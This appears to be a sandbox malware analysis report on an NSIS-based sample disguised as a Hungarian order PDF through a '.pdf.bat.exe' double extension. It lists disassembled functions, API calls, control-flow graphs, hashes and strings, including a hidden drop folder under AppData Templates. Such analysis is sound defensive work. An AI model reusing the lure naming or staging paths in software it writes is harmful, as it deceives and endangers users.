                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                              • API String ID: 2035342205-2575980746
                                              • Opcode ID: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                              • Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
                                              • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                              • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                              Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                              • Instruction ID: 13591abb153405db8c483c3749d8f5c5d6ef56c483b3dbf0ce0e93ae11c78ade
                                              • Opcode Fuzzy Hash: 0ca90ec9e464192c9522d3965182f3407f0f46d2e5c2ee50019c84c966272eaf
                                              • Instruction Fuzzy Hash: 58F17871D04269CBDF18CFA8C8946ADBBB0FF44305F25856ED456BB281D3386A8ACF45
                                              Function 004065C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,74DF3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D2
                                              • FindClose.KERNEL32(00000000), ref: 004065DE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: 8gB
                                              • API String ID: 2295610775-1733800166
                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                              • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                              • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                              Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 190 403d22-403d34 191 403e75-403e84 190->191 192 403d3a-403d40 190->192 194 403ed3-403ee8 191->194 195 403e86-403ece GetDlgItem * 2 call 4041fb SetClassLongW call 40140b 191->195 192->191 193 403d46-403d4f 192->193 196 403d51-403d5e SetWindowPos 193->196 197 403d64-403d67 193->197 199 403f28-403f2d call 404247 194->199 200 403eea-403eed 194->200 195->194 196->197 202 403d81-403d87 197->202 203 403d69-403d7b ShowWindow 197->203 208 403f32-403f4d 199->208 205 403f20-403f22 200->205 206 403eef-403efa call 401389 200->206 209 403da3-403da6 202->209 210 403d89-403d9e DestroyWindow 202->210 203->202 205->199 207 4041c8 205->207 206->205 221 403efc-403f1b SendMessageW 206->221 216 4041ca-4041d1 207->216 214 403f56-403f5c 208->214 215 403f4f-403f51 call 40140b 208->215 219 403da8-403db4 SetWindowLongW 209->219 220 403db9-403dbf 209->220 217 4041a5-4041ab 210->217 224 403f62-403f6d 214->224 225 404186-40419f DestroyWindow EndDialog 214->225 215->214 217->207 223 4041ad-4041b3 217->223 219->216 226 403e62-403e70 call 404262 220->226 227 403dc5-403dd6 GetDlgItem 220->227 221->216 223->207 229 4041b5-4041be ShowWindow 223->229 224->225 230 403f73-403fc0 call 4062a6 call 4041fb * 3 GetDlgItem 224->230 225->217 226->216 231 403df5-403df8 227->231 232 403dd8-403def SendMessageW IsWindowEnabled 227->232 229->207 260 403fc2-403fc7 230->260 261 403fca-404006 ShowWindow KiUserCallbackDispatcher call 40421d EnableWindow 230->261 233 403dfa-403dfb 231->233 234 403dfd-403e00 231->234 232->207 232->231 237 403e2b-403e30 call 4041d4 233->237 238 403e02-403e08 234->238 239 403e0e-403e13 234->239 237->226 241 403e49-403e5c SendMessageW 238->241 242 403e0a-403e0c 238->242 239->241 243 403e15-403e1b 239->243 241->226 242->237 246 403e32-403e3b call 40140b 243->246 247 403e1d-403e23 call 40140b 243->247 246->226 256 403e3d-403e47 246->256 258 403e29 247->258 256->258 258->237 260->261 264 404008-404009 261->264 265 40400b 261->265 266 40400d-40403b GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404050 266->267 268 40403d-40404e SendMessageW 266->268 269 404056-404095 call 404230 call 403d03 call 406284 lstrlenW call 4062a6 SetWindowTextW call 401389 267->269 268->269 269->208 280 40409b-40409d 269->280 280->208 281 4040a3-4040a7 280->281 282 4040c6-4040da DestroyWindow 281->282 283 4040a9-4040af 281->283 282->217 285 4040e0-40410d CreateDialogParamW 282->285 283->207 284 4040b5-4040bb 283->284 284->208 286 4040c1 284->286 285->217 287 404113-40416a call 4041fb GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->207 287->207 292 40416c-40417f ShowWindow call 404247 287->292 294 404184 292->294 294->217
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                              • ShowWindow.USER32(?), ref: 00403D7B
                                              • DestroyWindow.USER32 ref: 00403D8F
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                              • GetDlgItem.USER32(?,?), ref: 00403DCC
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                              • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                              • GetDlgItem.USER32(?,00000001), ref: 00403E95
                                              • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
                                              • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                              • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                              • EnableWindow.USER32(?,?), ref: 00403FFE
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
                                              • EnableMenuItem.USER32(00000000), ref: 0040401B
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                              • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                              • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                              • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                              • String ID: 6B
                                              • API String ID: 3282139019-4127139157
                                              • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                              • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                              • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                              • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D
                                              Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 295 403974-40398c call 40665e 298 4039a0-4039d7 call 406152 295->298 299 40398e-40399e call 4061cb 295->299 304 4039d9-4039ea call 406152 298->304 305 4039ef-4039f5 lstrcatW 298->305 308 4039fa-403a23 call 403c4a call 405c61 299->308 304->305 305->308 313 403ab5-403abd call 405c61 308->313 314 403a29-403a2e 308->314 320 403acb-403af0 LoadImageW 313->320 321 403abf-403ac6 call 4062a6 313->321 314->313 316 403a34-403a5c call 406152 314->316 316->313 322 403a5e-403a62 316->322 324 403b71-403b79 call 40140b 320->324 325 403af2-403b22 RegisterClassW 320->325 321->320 326 403a74-403a80 lstrlenW 322->326 327 403a64-403a71 call 405b86 322->327 338 403b83-403b8e call 403c4a 324->338 339 403b7b-403b7e 324->339 328 403c40 325->328 329 403b28-403b6c SystemParametersInfoW CreateWindowExW 325->329 333 403a82-403a90 lstrcmpiW 326->333 334 403aa8-403ab0 call 405b59 call 406284 326->334 327->326 332 403c42-403c49 328->332 329->324 333->334 337 403a92-403a9c GetFileAttributesW 333->337 334->313 341 403aa2-403aa3 call 405ba5 337->341 342 403a9e-403aa0 337->342 348 403b94-403bae ShowWindow call 4065ee 338->348 349 403c17-403c18 call 4053bf 338->349 339->332 341->334 342->334 342->341 354 403bb0-403bb5 call 4065ee 348->354 355 403bba-403bcc GetClassInfoW 348->355 353 403c1d-403c1f 349->353 356 403c21-403c27 353->356 357 403c39-403c3b call 40140b 353->357 354->355 360 403be4-403c07 DialogBoxParamW call 40140b 355->360 361 403bce-403bde GetClassInfoW RegisterClassW 355->361 356->339 362 403c2d-403c34 call 40140b 356->362 357->328 366 403c0c-403c15 call 4038c4 360->366 361->360 362->339 366->332
                                              APIs
                                                • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                              • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00000000), ref: 004039F5
                                              • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                              • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                              • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC
                                                • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                              • RegisterClassW.USER32(004291A0), ref: 00403B19
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                              • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                              • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                              • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                              • API String ID: 1975747703-1108392959
                                              • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                              • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                              • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                              • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D
                                              Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405d7a 372 402f37-402f65 call 406284 call 405ba5 call 406284 GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 375 40310f-403113 373->375 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 4032fb 384->387 386->387 395 402f9a-402fa1 387->395 396 4030bc-4030c4 call 402e79 387->396 391 403067-40307f call 403311 call 4032fb 388->391 392 403089-4030b3 GlobalAlloc call 403311 call 403116 388->392 389->375 391->389 418 403081-403087 391->418 392->389 416 4030c6-4030d7 392->416 400 402fa3-402fb7 call 405d35 395->400 401 40301d-403021 395->401 396->389 407 40302b-403031 400->407 415 402fb9-402fc0 400->415 406 403023-40302a call 402e79 401->406 401->407 406->407 412 403040-40304a 407->412 413 403033-40303d call 406751 407->413 412->384 417 403050 412->417 413->412 415->407 422 402fc2-402fc9 415->422 423 4030d9 416->423 424 4030df-4030e4 416->424 417->381 418->389 418->392 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d35 426->428 427->407 429 402fdd-402ffd 427->429 432 40310d 428->432 429->389 431 403003-403007 429->431 433 403009-40300d 431->433 434 40300f-403017 431->434 432->375 433->417 433->434 434->407 435 403019-40301b 434->435 435->407
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402EEE
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 4283519449-2073436992
                                              • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                              • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                              • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                              • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD
                                              Function 004062A6 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 436 4062a6-4062b1 437 4062b3-4062c2 436->437 438 4062c4-4062da 436->438 437->438 439 4062e0-4062ed 438->439 440 4064f2-4064f8 438->440 439->440 441 4062f3-4062fa 439->441 442 4064fe-406509 440->442 443 4062ff-40630c 440->443 441->440 445 406514-406515 442->445 446 40650b-40650f call 406284 442->446 443->442 444 406312-40631e 443->444 447 406324-406362 444->447 448 4064df 444->448 446->445 450 406482-406486 447->450 451 406368-406373 447->451 452 4064e1-4064eb 448->452 453 4064ed-4064f0 448->453 456 406488-40648e 450->456 457 4064b9-4064bd 450->457 454 406375-40637a 451->454 455 40638c 451->455 452->440 453->440 454->455 460 40637c-40637f 454->460 463 406393-40639a 455->463 461 406490-40649c call 4061cb 456->461 462 40649e-4064aa call 406284 456->462 458 4064cc-4064dd lstrlenW 457->458 459 4064bf-4064c7 call 4062a6 457->459 458->440 459->458 460->455 466 406381-406384 460->466 472 4064af-4064b5 461->472 462->472 468 40639c-40639e 463->468 469 40639f-4063a1 463->469 466->455 473 406386-40638a 466->473 468->469 470 4063a3-4063ca call 406152 469->470 471 4063dc-4063df 469->471 484 4063d0-4063d7 call 4062a6 470->484 485 40646a-40646d 470->485 477 4063e1-4063ed GetSystemDirectoryW 471->477 478 4063ef-4063f2 471->478 472->458 476 4064b7 472->476 473->463 480 40647a-406480 call 406518 476->480 481 406461-406465 477->481 482 4063f4-406402 GetWindowsDirectoryW 478->482 483 40645d-40645f 478->483 480->458 481->480 487 406467 481->487 482->483 483->481 486 406404-40640e 483->486 484->481 485->480 490 40646f-406475 lstrcatW 485->490 492 406410-406413 486->492 493 406428-40643e SHGetSpecialFolderLocation 486->493 487->485 490->480 492->493 497 406415-40641c 492->497 494 406440-406457 SHGetPathFromIDListW CoTaskMemFree 493->494 495 406459 493->495 494->481 494->495 495->483 498 406424-406426 497->498 498->481 498->493
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000), ref: 004063FA
                                              • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000), ref: 00406436
                                              • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                              • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                              • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000000), ref: 004064CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2571237782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571271225.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571292675.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2571406483.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-2444340805
                                              • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                              • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                              • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                              • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D
                                              Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
